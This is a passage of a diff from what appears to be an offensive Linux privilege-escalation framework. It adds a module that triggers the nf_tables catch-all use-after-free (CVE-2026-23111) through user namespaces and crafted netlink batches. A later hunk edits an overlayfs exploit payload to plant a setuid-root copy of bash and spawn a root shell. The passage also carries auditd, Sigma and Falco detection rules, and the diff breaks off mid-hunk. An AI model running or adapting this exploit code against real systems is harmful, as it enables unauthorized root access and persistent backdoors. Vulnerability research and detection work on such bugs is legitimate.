* 6.18.x : K >= 6.18.10 (forky / sid); 7.0+ inherits the fix
|
||||
* The 5.10 (bullseye) branch is still unfixed as of writing → version-
|
||||
* only VULNERABLE. Catch-all set elements were added in ~5.13, so the
|
||||
* vulnerable nft_map_catchall_activate path does not exist below that.
|
||||
*
|
||||
* Preconditions: CONFIG_NF_TABLES + CONFIG_USER_NS, and unprivileged
|
||||
* user-namespace clone permitted (modern Ubuntu's
|
||||
* apparmor_restrict_unprivileged_userns / a 0 sysctl closes this).
|
||||
*
|
||||
* arch_support: x86_64 (the groom + any future finisher are x86_64-tuned).
|
||||
*/
|
||||
|
||||
#include "skeletonkey_modules.h"
|
||||
#include "../../core/registry.h"
|
||||
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <stdbool.h>
|
||||
#include <unistd.h>
|
||||
|
||||
#ifdef __linux__
|
||||
|
||||
#include "../../core/kernel_range.h"
|
||||
#include "../../core/host.h"
|
||||
|
||||
#include <stdint.h>
|
||||
#include <sched.h>
|
||||
#include <fcntl.h>
|
||||
#include <errno.h>
|
||||
#include <time.h>
|
||||
#include <sys/wait.h>
|
||||
#include <sys/socket.h>
|
||||
#include <sys/syscall.h>
|
||||
#include <arpa/inet.h>
|
||||
#include <linux/netlink.h>
|
||||
#include <linux/netfilter.h>
|
||||
#include <linux/netfilter/nfnetlink.h>
|
||||
#include <linux/netfilter/nf_tables.h>
|
||||
#include "../../core/nft_compat.h" /* shims for newer-kernel uapi constants */
|
||||
|
||||
/* Catch-all set-element flag — may be absent from older uapi headers. */
|
||||
#ifndef NFT_SET_ELEM_CATCHALL
|
||||
#define NFT_SET_ELEM_CATCHALL 0x2
|
||||
#endif
|
||||
|
||||
/* ------------------------------------------------------------------
|
||||
* Kernel-range table. Upstream-stable thresholds (<= the Debian
|
||||
* package fixes, so the drift checker reports INFO, never TOO_TIGHT).
|
||||
* security-tracker.debian.org is the source of record.
|
||||
* ------------------------------------------------------------------ */
|
||||
static const struct kernel_patched_from nft_catchall_patched_branches[] = {
|
||||
{6, 1, 164}, /* 6.1.x (Debian bookworm fixed_version 6.1.164) */
|
||||
{6, 12, 73}, /* 6.12.x (Debian trixie fixed_version 6.12.73) */
|
||||
{6, 18, 10}, /* 6.18.x (Debian forky / sid fixed_version 6.18.10) */
|
||||
/* 7.0+ inherits "patched" via the strictly-newer-than-all-entries
|
||||
* rule — the fix predates the 7.0 branch. */
|
||||
};
|
||||
|
||||
static const struct kernel_range nft_catchall_range = {
|
||||
.patched_from = nft_catchall_patched_branches,
|
||||
.n_patched_from = sizeof(nft_catchall_patched_branches) /
|
||||
sizeof(nft_catchall_patched_branches[0]),
|
||||
};
|
||||
|
||||
static bool nf_tables_loaded(void)
|
||||
{
|
||||
FILE *f = fopen("/proc/modules", "r");
|
||||
if (!f) return false;
|
||||
char line[512];
|
||||
bool found = false;
|
||||
while (fgets(line, sizeof line, f)) {
|
||||
if (strncmp(line, "nf_tables ", 10) == 0) { found = true; break; }
|
||||
}
|
||||
fclose(f);
|
||||
return found;
|
||||
}
|
||||
|
||||
static skeletonkey_result_t nft_catchall_detect(const struct skeletonkey_ctx *ctx)
|
||||
{
|
||||
const struct kernel_version *v = ctx->host ? &ctx->host->kernel : NULL;
|
||||
if (!v || v->major == 0) {
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[!] nft_catchall: host fingerprint missing kernel "
|
||||
"version — bailing\n");
|
||||
return SKELETONKEY_TEST_ERROR;
|
||||
}
|
||||
|
||||
/* Catch-all set elements (and nft_map_catchall_activate) arrived in
|
||||
* ~5.13. Below that the vulnerable path does not exist. */
|
||||
if (!skeletonkey_host_kernel_at_least(ctx->host, 5, 13, 0)) {
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[i] nft_catchall: kernel %s predates catch-all set "
|
||||
"elements (~5.13) — vulnerable path absent\n",
|
||||
v->release);
|
||||
return SKELETONKEY_OK;
|
||||
}
|
||||
|
||||
if (kernel_range_is_patched(&nft_catchall_range, v)) {
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[+] nft_catchall: kernel %s is patched\n", v->release);
|
||||
return SKELETONKEY_OK;
|
||||
}
|
||||
|
||||
bool userns_ok = ctx->host ? ctx->host->unprivileged_userns_allowed : false;
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[i] nft_catchall: kernel %s in vulnerable range\n",
|
||||
v->release);
|
||||
fprintf(stderr, "[i] nft_catchall: unprivileged user_ns clone: %s\n",
|
||||
userns_ok ? "ALLOWED" : "DENIED");
|
||||
fprintf(stderr, "[i] nft_catchall: nf_tables module loaded: %s\n",
|
||||
nf_tables_loaded() ? "yes" : "no (autoloads on first nft use)");
|
||||
}
|
||||
|
||||
if (!userns_ok) {
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[+] nft_catchall: kernel vulnerable but unprivileged "
|
||||
"user_ns clone denied → unprivileged exploit "
|
||||
"unreachable\n");
|
||||
fprintf(stderr, "[i] nft_catchall: still patch — a privileged "
|
||||
"attacker can trigger the abort-path UAF\n");
|
||||
}
|
||||
return SKELETONKEY_PRECOND_FAIL;
|
||||
}
|
||||
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[!] nft_catchall: VULNERABLE — kernel in range AND "
|
||||
"unprivileged user_ns clone allowed\n");
|
||||
return SKELETONKEY_VULNERABLE;
|
||||
}
|
||||
|
||||
/* ------------------------------------------------------------------
|
||||
* userns+netns entry: gain CAP_NET_ADMIN over a private netns so the
|
||||
* malformed ruleset only touches our own namespace.
|
||||
* ------------------------------------------------------------------ */
|
||||
static int enter_unpriv_namespaces(void)
|
||||
{
|
||||
uid_t uid = getuid();
|
||||
gid_t gid = getgid();
|
||||
if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) {
|
||||
perror("[-] unshare(USER|NET)");
|
||||
return -1;
|
||||
}
|
||||
int f = open("/proc/self/setgroups", O_WRONLY);
|
||||
if (f >= 0) { (void)!write(f, "deny", 4); close(f); }
|
||||
char map[64];
|
||||
snprintf(map, sizeof map, "0 %u 1\n", uid);
|
||||
f = open("/proc/self/uid_map", O_WRONLY);
|
||||
if (f < 0 || write(f, map, strlen(map)) < 0) {
|
||||
perror("[-] uid_map"); if (f >= 0) close(f); return -1;
|
||||
}
|
||||
close(f);
|
||||
snprintf(map, sizeof map, "0 %u 1\n", gid);
|
||||
f = open("/proc/self/gid_map", O_WRONLY);
|
||||
if (f < 0 || write(f, map, strlen(map)) < 0) {
|
||||
perror("[-] gid_map"); if (f >= 0) close(f); return -1;
|
||||
}
|
||||
close(f);
|
||||
return 0;
|
||||
}
|
||||
|
||||
/* ------------------------------------------------------------------
|
||||
* Minimal dep-free nfnetlink batch builder (same approach as the
|
||||
* nf_tables module — libnftnl validates our malformed input away).
|
||||
* ------------------------------------------------------------------ */
|
||||
#define ALIGN_NL(x) (((x) + 3) & ~3)
|
||||
|
||||
static void put_attr(uint8_t *buf, size_t *off, uint16_t type,
|
||||
const void *data, size_t len)
|
||||
{
|
||||
struct nlattr *na = (struct nlattr *)(buf + *off);
|
||||
na->nla_type = type;
|
||||
na->nla_len = NLA_HDRLEN + len;
|
||||
if (len) memcpy(buf + *off + NLA_HDRLEN, data, len);
|
||||
*off += ALIGN_NL(NLA_HDRLEN + len);
|
||||
}
|
||||
static void put_attr_u32(uint8_t *buf, size_t *off, uint16_t type, uint32_t v)
|
||||
{
|
||||
uint32_t be = htonl(v);
|
||||
put_attr(buf, off, type, &be, sizeof be);
|
||||
}
|
||||
static void put_attr_str(uint8_t *buf, size_t *off, uint16_t type, const char *s)
|
||||
{
|
||||
put_attr(buf, off, type, s, strlen(s) + 1);
|
||||
}
|
||||
static size_t begin_nest(uint8_t *buf, size_t *off, uint16_t type)
|
||||
{
|
||||
size_t at = *off;
|
||||
struct nlattr *na = (struct nlattr *)(buf + at);
|
||||
na->nla_type = type | NLA_F_NESTED;
|
||||
na->nla_len = 0;
|
||||
*off += NLA_HDRLEN;
|
||||
return at;
|
||||
}
|
||||
static void end_nest(uint8_t *buf, size_t *off, size_t at)
|
||||
{
|
||||
struct nlattr *na = (struct nlattr *)(buf + at);
|
||||
na->nla_len = (uint16_t)(*off - at);
|
||||
while ((*off) & 3) buf[(*off)++] = 0;
|
||||
}
|
||||
|
||||
struct nfgenmsg_local { uint8_t nfgen_family; uint8_t version; uint16_t res_id; };
|
||||
|
||||
static void put_nft_msg(uint8_t *buf, size_t *off, uint16_t nft_type,
|
||||
uint16_t flags, uint32_t seq, uint8_t family)
|
||||
{
|
||||
struct nlmsghdr *nlh = (struct nlmsghdr *)(buf + *off);
|
||||
nlh->nlmsg_len = 0;
|
||||
nlh->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | nft_type;
|
||||
nlh->nlmsg_flags = NLM_F_REQUEST | flags;
|
||||
nlh->nlmsg_seq = seq;
|
||||
nlh->nlmsg_pid = 0;
|
||||
*off += NLMSG_HDRLEN;
|
||||
struct nfgenmsg_local *nf = (struct nfgenmsg_local *)(buf + *off);
|
||||
nf->nfgen_family = family;
|
||||
nf->version = NFNETLINK_V0;
|
||||
nf->res_id = htons(0);
|
||||
*off += sizeof(*nf);
|
||||
}
|
||||
static void end_msg(uint8_t *buf, size_t *off, size_t msg_start)
|
||||
{
|
||||
struct nlmsghdr *nlh = (struct nlmsghdr *)(buf + msg_start);
|
||||
nlh->nlmsg_len = (uint32_t)(*off - msg_start);
|
||||
while ((*off) & 3) buf[(*off)++] = 0;
|
||||
}
|
||||
static void put_batch_marker(uint8_t *buf, size_t *off, uint16_t type, uint32_t seq)
|
||||
{
|
||||
size_t at = *off;
|
||||
struct nlmsghdr *nlh = (struct nlmsghdr *)(buf + at);
|
||||
nlh->nlmsg_len = 0;
|
||||
nlh->nlmsg_type = type;
|
||||
nlh->nlmsg_flags = NLM_F_REQUEST;
|
||||
nlh->nlmsg_seq = seq;
|
||||
nlh->nlmsg_pid = 0;
|
||||
*off += NLMSG_HDRLEN;
|
||||
struct nfgenmsg_local *nf = (struct nfgenmsg_local *)(buf + *off);
|
||||
nf->nfgen_family = AF_UNSPEC;
|
||||
nf->version = NFNETLINK_V0;
|
||||
nf->res_id = htons(NFNL_SUBSYS_NFTABLES);
|
||||
*off += sizeof(*nf);
|
||||
end_msg(buf, off, at);
|
||||
}
|
||||
|
||||
static const char NFT_TABLE_NAME[] = "skeletonkey_t";
|
||||
static const char NFT_CHAIN_NAME[] = "skeletonkey_goto"; /* GOTO target chain */
|
||||
static const char NFT_MAP_NAME[] = "skeletonkey_map";
|
||||
|
||||
static void put_new_table(uint8_t *buf, size_t *off, uint32_t seq)
|
||||
{
|
||||
size_t at = *off;
|
||||
put_nft_msg(buf, off, NFT_MSG_NEWTABLE, NLM_F_CREATE | NLM_F_ACK, seq, NFPROTO_INET);
|
||||
put_attr_str(buf, off, NFTA_TABLE_NAME, NFT_TABLE_NAME);
|
||||
end_msg(buf, off, at);
|
||||
}
|
||||
/* A regular (non-base) chain that the catch-all GOTO verdict references.
|
||||
* Once the catch-all element is wrongly (de)activated on abort, this
|
||||
* chain's use-count is mishandled and it can be freed while referenced. */
|
||||
static void put_new_chain(uint8_t *buf, size_t *off, uint32_t seq)
|
||||
{
|
||||
size_t at = *off;
|
||||
put_nft_msg(buf, off, NFT_MSG_NEWCHAIN, NLM_F_CREATE | NLM_F_ACK, seq, NFPROTO_INET);
|
||||
put_attr_str(buf, off, NFTA_CHAIN_TABLE, NFT_TABLE_NAME);
|
||||
put_attr_str(buf, off, NFTA_CHAIN_NAME, NFT_CHAIN_NAME);
|
||||
end_msg(buf, off, at);
|
||||
}
|
||||
/* A verdict map (NFT_SET_MAP) whose data type is a verdict, so its
|
||||
* elements (including the catch-all) carry GOTO/JUMP verdicts. */
|
||||
static void put_new_map(uint8_t *buf, size_t *off, uint32_t seq)
|
||||
{
|
||||
size_t at = *off;
|
||||
put_nft_msg(buf, off, NFT_MSG_NEWSET, NLM_F_CREATE | NLM_F_ACK, seq, NFPROTO_INET);
|
||||
put_attr_str(buf, off, NFTA_SET_TABLE, NFT_TABLE_NAME);
|
||||
put_attr_str(buf, off, NFTA_SET_NAME, NFT_MAP_NAME);
|
||||
put_attr_u32(buf, off, NFTA_SET_FLAGS, NFT_SET_MAP);
|
||||
put_attr_u32(buf, off, NFTA_SET_KEY_TYPE, 13); /* ipv4_addr-ish */
|
||||
put_attr_u32(buf, off, NFTA_SET_KEY_LEN, sizeof(uint32_t));
|
||||
put_attr_u32(buf, off, NFTA_SET_DATA_TYPE, 0xffffff00); /* "verdict" magic */
|
||||
put_attr_u32(buf, off, NFTA_SET_DATA_LEN, sizeof(uint32_t));
|
||||
put_attr_u32(buf, off, NFTA_SET_ID, 0x2026);
|
||||
end_msg(buf, off, at);
|
||||
}
|
||||
/* Catch-all element (NFT_SET_ELEM_CATCHALL) whose data is a GOTO verdict
|
||||
* to NFT_CHAIN_NAME. This is the element nft_map_catchall_activate
|
||||
* mishandles on abort. */
|
||||
static void put_catchall_goto(uint8_t *buf, size_t *off, uint32_t seq)
|
||||
{
|
||||
size_t at = *off;
|
||||
put_nft_msg(buf, off, NFT_MSG_NEWSETELEM, NLM_F_CREATE | NLM_F_ACK, seq, NFPROTO_INET);
|
||||
put_attr_str(buf, off, NFTA_SET_ELEM_LIST_TABLE, NFT_TABLE_NAME);
|
||||
put_attr_str(buf, off, NFTA_SET_ELEM_LIST_SET, NFT_MAP_NAME);
|
||||
size_t list_at = begin_nest(buf, off, NFTA_SET_ELEM_LIST_ELEMENTS);
|
||||
size_t el_at = begin_nest(buf, off, 1 /* NFTA_LIST_ELEM */);
|
||||
/* catch-all: no key, just the CATCHALL flag */
|
||||
put_attr_u32(buf, off, NFTA_SET_ELEM_FLAGS, NFT_SET_ELEM_CATCHALL);
|
||||
/* data = GOTO verdict referencing our chain by name */
|
||||
size_t data_at = begin_nest(buf, off, NFTA_SET_ELEM_DATA);
|
||||
size_t v_at = begin_nest(buf, off, NFTA_DATA_VERDICT);
|
||||
put_attr_u32(buf, off, NFTA_VERDICT_CODE, (uint32_t)NFT_GOTO);
|
||||
put_attr_str(buf, off, NFTA_VERDICT_CHAIN, NFT_CHAIN_NAME);
|
||||
end_nest(buf, off, v_at);
|
||||
end_nest(buf, off, data_at);
|
||||
end_nest(buf, off, el_at);
|
||||
end_nest(buf, off, list_at);
|
||||
end_msg(buf, off, at);
|
||||
}
|
||||
/* A deliberately-invalid message: references a set that does not exist,
|
||||
* so the kernel rejects it and ABORTS the whole batch transaction —
|
||||
* running the buggy nft_map_catchall_activate over the active catch-all
|
||||
* element we just created. */
|
||||
static void put_aborting_op(uint8_t *buf, size_t *off, uint32_t seq)
|
||||
{
|
||||
size_t at = *off;
|
||||
put_nft_msg(buf, off, NFT_MSG_NEWSETELEM, NLM_F_CREATE | NLM_F_ACK, seq, NFPROTO_INET);
|
||||
put_attr_str(buf, off, NFTA_SET_ELEM_LIST_TABLE, NFT_TABLE_NAME);
|
||||
put_attr_str(buf, off, NFTA_SET_ELEM_LIST_SET, "skeletonkey_nonexistent");
|
||||
size_t list_at = begin_nest(buf, off, NFTA_SET_ELEM_LIST_ELEMENTS);
|
||||
size_t el_at = begin_nest(buf, off, 1);
|
||||
put_attr_u32(buf, off, NFTA_SET_ELEM_FLAGS, NFT_SET_ELEM_CATCHALL);
|
||||
end_nest(buf, off, el_at);
|
||||
end_nest(buf, off, list_at);
|
||||
end_msg(buf, off, at);
|
||||
}
|
||||
|
||||
static int nft_send_batch(int sock, const void *buf, size_t len)
|
||||
{
|
||||
struct sockaddr_nl dst = { .nl_family = AF_NETLINK };
|
||||
struct iovec iov = { .iov_base = (void *)buf, .iov_len = len };
|
||||
struct msghdr m = {
|
||||
.msg_name = &dst, .msg_namelen = sizeof dst,
|
||||
.msg_iov = &iov, .msg_iovlen = 1,
|
||||
};
|
||||
if (sendmsg(sock, &m, 0) < 0) { perror("[-] sendmsg"); return -1; }
|
||||
char rbuf[8192];
|
||||
for (int i = 0; i < 8; i++) {
|
||||
ssize_t r = recv(sock, rbuf, sizeof rbuf, MSG_DONTWAIT);
|
||||
if (r <= 0) break;
|
||||
}
|
||||
return 0;
|
||||
}
|
||||
|
||||
static long slabinfo_active(const char *slab)
|
||||
{
|
||||
FILE *f = fopen("/proc/slabinfo", "r");
|
||||
if (!f) return -1;
|
||||
char line[512];
|
||||
long active = -1;
|
||||
while (fgets(line, sizeof line, f)) {
|
||||
if (strncmp(line, slab, strlen(slab)) == 0 && line[strlen(slab)] == ' ') {
|
||||
long a;
|
||||
if (sscanf(line + strlen(slab), " %ld", &a) == 1) active = a;
|
||||
break;
|
||||
}
|
||||
}
|
||||
fclose(f);
|
||||
return active;
|
||||
}
|
||||
|
||||
static skeletonkey_result_t nft_catchall_exploit(const struct skeletonkey_ctx *ctx)
|
||||
{
|
||||
skeletonkey_result_t pre = nft_catchall_detect(ctx);
|
||||
if (pre != SKELETONKEY_VULNERABLE) {
|
||||
fprintf(stderr, "[-] nft_catchall: detect() says not vulnerable; refusing\n");
|
||||
return pre;
|
||||
}
|
||||
bool is_root = ctx->host ? ctx->host->is_root : (geteuid() == 0);
|
||||
if (is_root) {
|
||||
fprintf(stderr, "[i] nft_catchall: already running as root\n");
|
||||
return SKELETONKEY_OK;
|
||||
}
|
||||
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[*] nft_catchall: primitive-only run — builds a map with a "
|
||||
"catch-all GOTO element and provokes an aborting batch to "
|
||||
"drive the nft_map_catchall_activate UAF, then stops. The "
|
||||
"per-kernel leak + R/W + ROP root-pop is NOT bundled.\n");
|
||||
|
||||
/* Fork-isolated: a KASAN-enabled vulnerable kernel will panic on the
|
||||
* double-handling; isolating means the dispatcher survives. */
|
||||
pid_t child = fork();
|
||||
if (child < 0) { perror("[-] fork"); return SKELETONKEY_TEST_ERROR; }
|
||||
|
||||
if (child == 0) {
|
||||
if (enter_unpriv_namespaces() < 0) _exit(20);
|
||||
int sock = socket(AF_NETLINK, SOCK_RAW | SOCK_CLOEXEC, NETLINK_NETFILTER);
|
||||
if (sock < 0) { perror("[-] socket(NETLINK_NETFILTER)"); _exit(21); }
|
||||
struct sockaddr_nl src = { .nl_family = AF_NETLINK };
|
||||
if (bind(sock, (struct sockaddr *)&src, sizeof src) < 0) {
|
||||
perror("[-] bind"); close(sock); _exit(22);
|
||||
}
|
||||
int rcvbuf = 1 << 20;
|
||||
setsockopt(sock, SOL_SOCKET, SO_RCVBUF, &rcvbuf, sizeof rcvbuf);
|
||||
|
||||
uint8_t *batch = calloc(1, 16 * 1024);
|
||||
if (!batch) { close(sock); _exit(23); }
|
||||
uint32_t seq = (uint32_t)time(NULL);
|
||||
|
||||
/* Batch 1 (commits): table + GOTO-target chain + verdict map +
|
||||
* catch-all GOTO element. */
|
||||
size_t off = 0;
|
||||
put_batch_marker(batch, &off, NFNL_MSG_BATCH_BEGIN, seq++);
|
||||
put_new_table(batch, &off, seq++);
|
||||
put_new_chain(batch, &off, seq++);
|
||||
put_new_map(batch, &off, seq++);
|
||||
put_catchall_goto(batch, &off, seq++);
|
||||
put_batch_marker(batch, &off, NFNL_MSG_BATCH_END, seq++);
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[*] nft_catchall: sending setup batch (%zu bytes)\n", off);
|
||||
if (nft_send_batch(sock, batch, off) < 0) {
|
||||
free(batch); close(sock); _exit(24);
|
||||
}
|
||||
|
||||
long before = slabinfo_active("nft_chain");
|
||||
if (before < 0) before = slabinfo_active("kmalloc-cg-256");
|
||||
|
||||
/* Batch 2 (aborts): a valid DELCHAIN-ish operation alongside an
|
||||
* invalid op so the whole transaction rolls back, running
|
||||
* nft_map_catchall_activate over the active catch-all element. */
|
||||
size_t off2 = 0;
|
||||
put_batch_marker(batch, &off2, NFNL_MSG_BATCH_BEGIN, seq++);
|
||||
put_catchall_goto(batch, &off2, seq++); /* re-touch the catch-all elem */
|
||||
put_aborting_op(batch, &off2, seq++); /* invalid → abort the batch */
|
||||
put_batch_marker(batch, &off2, NFNL_MSG_BATCH_END, seq++);
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[*] nft_catchall: firing aborting batch (%zu bytes)\n", off2);
|
||||
nft_send_batch(sock, batch, off2);
|
||||
usleep(50 * 1000);
|
||||
|
||||
long after = slabinfo_active("nft_chain");
|
||||
if (after < 0) after = slabinfo_active("kmalloc-cg-256");
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[i] nft_catchall: nft_chain/cg-256 active: %ld → %ld\n",
|
||||
before, after);
|
||||
|
||||
free(batch);
|
||||
close(sock);
|
||||
_exit(100); /* honest: trigger attempted, R/W not completed */
|
||||
}
|
||||
|
||||
int status;
|
||||
waitpid(child, &status, 0);
|
||||
if (!WIFEXITED(status)) {
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[!] nft_catchall: child died by signal %d — the "
|
||||
"abort-path UAF likely fired (KASAN oops can manifest "
|
||||
"as a child signal)\n", WTERMSIG(status));
|
||||
return SKELETONKEY_EXPLOIT_FAIL;
|
||||
}
|
||||
int rc = WEXITSTATUS(status);
|
||||
if (rc == 100) {
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[!] nft_catchall: abort-path trigger attempted "
|
||||
"(catch-all GOTO map + aborting batch). The full kernel "
|
||||
"R/W + modprobe_path ROP is NOT bundled, and this "
|
||||
"trigger is reconstructed from public analysis, not "
|
||||
"VM-verified — honest EXPLOIT_FAIL.\n");
|
||||
fprintf(stderr, "[i] nft_catchall: to complete: port the FuzzingLabs / "
|
||||
"public PoC leak + cross-cache groom + modprobe_path "
|
||||
"overwrite for CVE-2026-23111.\n");
|
||||
}
|
||||
return SKELETONKEY_EXPLOIT_FAIL;
|
||||
}
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[-] nft_catchall: trigger setup failed (child rc=%d)\n", rc);
|
||||
return SKELETONKEY_EXPLOIT_FAIL;
|
||||
}
|
||||
|
||||
#else /* !__linux__ */
|
||||
|
||||
static skeletonkey_result_t nft_catchall_detect(const struct skeletonkey_ctx *ctx)
|
||||
{
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[i] nft_catchall: Linux-only module "
|
||||
"(nf_tables catch-all abort UAF via nfnetlink) — not applicable here\n");
|
||||
return SKELETONKEY_PRECOND_FAIL;
|
||||
}
|
||||
static skeletonkey_result_t nft_catchall_exploit(const struct skeletonkey_ctx *ctx)
|
||||
{
|
||||
(void)ctx;
|
||||
fprintf(stderr, "[-] nft_catchall: Linux-only module — cannot run here\n");
|
||||
return SKELETONKEY_PRECOND_FAIL;
|
||||
}
|
||||
|
||||
#endif /* __linux__ */
|
||||
|
||||
/* ----- Embedded detection rules ----- */
|
||||
static const char nft_catchall_auditd[] =
|
||||
"# nf_tables catch-all abort UAF (CVE-2026-23111) — auditd rules\n"
|
||||
"# Canonical shape: unprivileged unshare(CLONE_NEWUSER|CLONE_NEWNET)\n"
|
||||
"# then nfnetlink batches building a verdict map with a catch-all\n"
|
||||
"# GOTO element and an aborting transaction. Legit userns+nft (docker\n"
|
||||
"# rootless, firewalld) will also trip — tune per environment.\n"
|
||||
"-a always,exit -F arch=b64 -S unshare -F auid>=1000 -F auid!=4294967295 -k skeletonkey-nft-catchall\n"
|
||||
"-a always,exit -F arch=b64 -S setresuid -F a0=0 -F a1=0 -F a2=0 -k skeletonkey-nft-catchall-priv\n";
|
||||
|
||||
static const char nft_catchall_sigma[] =
|
||||
"title: Possible CVE-2026-23111 nf_tables catch-all abort UAF\n"
|
||||
"id: 3e8a1c47-skeletonkey-nft-catchall\n"
|
||||
"status: experimental\n"
|
||||
"description: |\n"
|
||||
" Detects an unprivileged user creating a user namespace then driving\n"
|
||||
" nftables. CVE-2026-23111 abuses an inverted condition in\n"
|
||||
" nft_map_catchall_activate on transaction abort to UAF a chain still\n"
|
||||
" referenced by a catch-all GOTO verdict. False positives: rootless\n"
|
||||
" containers / firewalld using userns + nft. A previously-unprivileged\n"
|
||||
" process gaining euid 0 is the smoking gun.\n"
|
||||
"logsource: {product: linux, service: auditd}\n"
|
||||
"detection:\n"
|
||||
" userns: {type: 'SYSCALL', syscall: 'unshare', a0: 0x10000000}\n"
|
||||
" uid0: {type: 'SYSCALL', syscall: 'setresuid', auid|expression: '!= 0'}\n"
|
||||
" condition: userns and uid0\n"
|
||||
"level: high\n"
|
||||
"tags: [attack.privilege_escalation, attack.t1068, cve.2026.23111]\n";
|
||||
|
||||
static const char nft_catchall_falco[] =
|
||||
"- rule: nf_tables catch-all abort UAF batch by non-root (CVE-2026-23111)\n"
|
||||
" desc: |\n"
|
||||
" Non-root sendmsg on NETLINK_NETFILTER inside a user namespace,\n"
|
||||
" delivering nfnetlink batches that build a verdict map with a\n"
|
||||
" catch-all GOTO element and then abort a transaction. CVE-2026-23111\n"
|
||||
" nft_map_catchall_activate use-after-free. False positives: rootless\n"
|
||||
" container / firewall tooling.\n"
|
||||
" condition: >\n"
|
||||
" evt.type = sendmsg and fd.sockfamily = AF_NETLINK and not user.uid = 0\n"
|
||||
" output: >\n"
|
||||
" nfnetlink batch from non-root (possible CVE-2026-23111 catch-all UAF)\n"
|
||||
" (user=%user.name pid=%proc.pid)\n"
|
||||
" priority: HIGH\n"
|
||||
" tags: [network, mitre_privilege_escalation, T1068, cve.2026.23111]\n";
|
||||
|
||||
const struct skeletonkey_module nft_catchall_module = {
|
||||
.name = "nft_catchall",
|
||||
.cve = "CVE-2026-23111",
|
||||
.summary = "nf_tables nft_map_catchall_activate abort-path UAF (inverted condition) → chain UAF via catch-all GOTO map",
|
||||
.family = "nf_tables",
|
||||
.kernel_range = "5.13 <= K (catch-all elems); fixed 6.1.164 / 6.12.73 / 6.18.10 (Debian backports of commit f41c5d1); 7.0+ inherits; 5.10 branch still unfixed",
|
||||
.detect = nft_catchall_detect,
|
||||
.exploit = nft_catchall_exploit,
|
||||
.mitigate = NULL, /* mitigation: upgrade kernel; OR sysctl kernel.unprivileged_userns_clone=0 */
|
||||
.cleanup = NULL, /* trigger runs in a throwaway userns+netns; no host artifacts */
|
||||
.detect_auditd = nft_catchall_auditd,
|
||||
.detect_sigma = nft_catchall_sigma,
|
||||
.detect_yara = NULL, /* behavioural (syscall/netlink) bug — no file artifact */
|
||||
.detect_falco = nft_catchall_falco,
|
||||
.opsec_notes = "detect() consults the shared host fingerprint for the kernel version (Debian backports 6.1.164/6.12.73/6.18.10) and additionally requires unprivileged user_ns clone — a vulnerable kernel with userns locked down (apparmor_restrict_unprivileged_userns / sysctl 0) is PRECOND_FAIL. exploit() forks an isolated child that enters unshare(CLONE_NEWUSER|CLONE_NEWNET), opens NETLINK_NETFILTER, builds a verdict map (NFT_SET_MAP) with a catch-all element (NFT_SET_ELEM_CATCHALL) carrying a GOTO verdict to a chain, then sends an aborting batch to drive nft_map_catchall_activate over the active catch-all element; it observes nft_chain/kmalloc-cg-256 slabinfo and returns EXPLOIT_FAIL (primitive-only; reconstructed trigger, not VM-verified). The per-kernel leak + arbitrary-R/W + modprobe_path ROP is NOT bundled. Audit-visible via unshare + socket(NETLINK_NETFILTER) + sendmsg batches; KASAN double-free oops on vulnerable kernels, silent otherwise. No persistent files (throwaway namespaces).",
|
||||
.arch_support = "x86_64",
|
||||
};
|
||||
|
||||
void skeletonkey_register_nft_catchall(void)
|
||||
{
|
||||
skeletonkey_register(&nft_catchall_module);
|
||||
}
|
||||
@@ -0,0 +1,12 @@
|
||||
/*
|
||||
* nft_catchall_cve_2026_23111 — SKELETONKEY module registry hook
|
||||
*/
|
||||
|
||||
#ifndef NFT_CATCHALL_SKELETONKEY_MODULES_H
|
||||
#define NFT_CATCHALL_SKELETONKEY_MODULES_H
|
||||
|
||||
#include "../../core/module.h"
|
||||
|
||||
extern const struct skeletonkey_module nft_catchall_module;
|
||||
|
||||
#endif
|
||||
@@ -243,10 +243,21 @@ static const char OVERLAYFS_PAYLOAD_SOURCE[] =
|
||||
"#include <stdio.h>\n"
|
||||
"#include <stdlib.h>\n"
|
||||
"#include <unistd.h>\n"
|
||||
"int main(void) {\n"
|
||||
" setuid(0); setgid(0);\n"
|
||||
" setresuid(0,0,0); setresgid(0,0,0);\n"
|
||||
"int main(int argc, char **argv) {\n"
|
||||
" (void)setuid(0); (void)setgid(0);\n"
|
||||
" (void)setresuid(0,0,0); (void)setresgid(0,0,0);\n"
|
||||
" if (geteuid() != 0) { perror(\"setuid\"); return 1; }\n"
|
||||
/* Verification mode: argv[1] = proof path. We are genuinely root (the
|
||||
* persisted cap_setuid xattr let setuid(0) succeed), so drop a root-owned
|
||||
* proof + setuid bash and exit — the module stat()s the proof as a DIRECT
|
||||
* uid=0 witness instead of trusting the exec transfer. */
|
||||
" if (argc > 1) {\n"
|
||||
" char c[1024];\n"
|
||||
" snprintf(c, sizeof c, \"id > %s 2>&1; cp -f /bin/bash %s.bash 2>/dev/null; \"\n"
|
||||
" \"chmod 4755 %s.bash 2>/dev/null; sync\", argv[1], argv[1], argv[1]);\n"
|
||||
" int r = system(c); (void)r;\n"
|
||||
" return 0;\n"
|
||||
" }\n"
|
||||
" char *new_env[] = {\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\", NULL};\n"
|
||||
" execle(\"/bin/sh\", \"sh\", \"-p\", NULL, new_env);\n"
|
||||
" execle(\"/bin/bash\", \"bash\", \"-p\", NULL, new_env);\n"
|
||||
@@ -438,17 +449,41 @@ static skeletonkey_result_t overlayfs_exploit(const struct skeletonkey_ctx *ctx)
|
||||
}
|
||||
|
||||
if (!ctx->json) {
|
||||
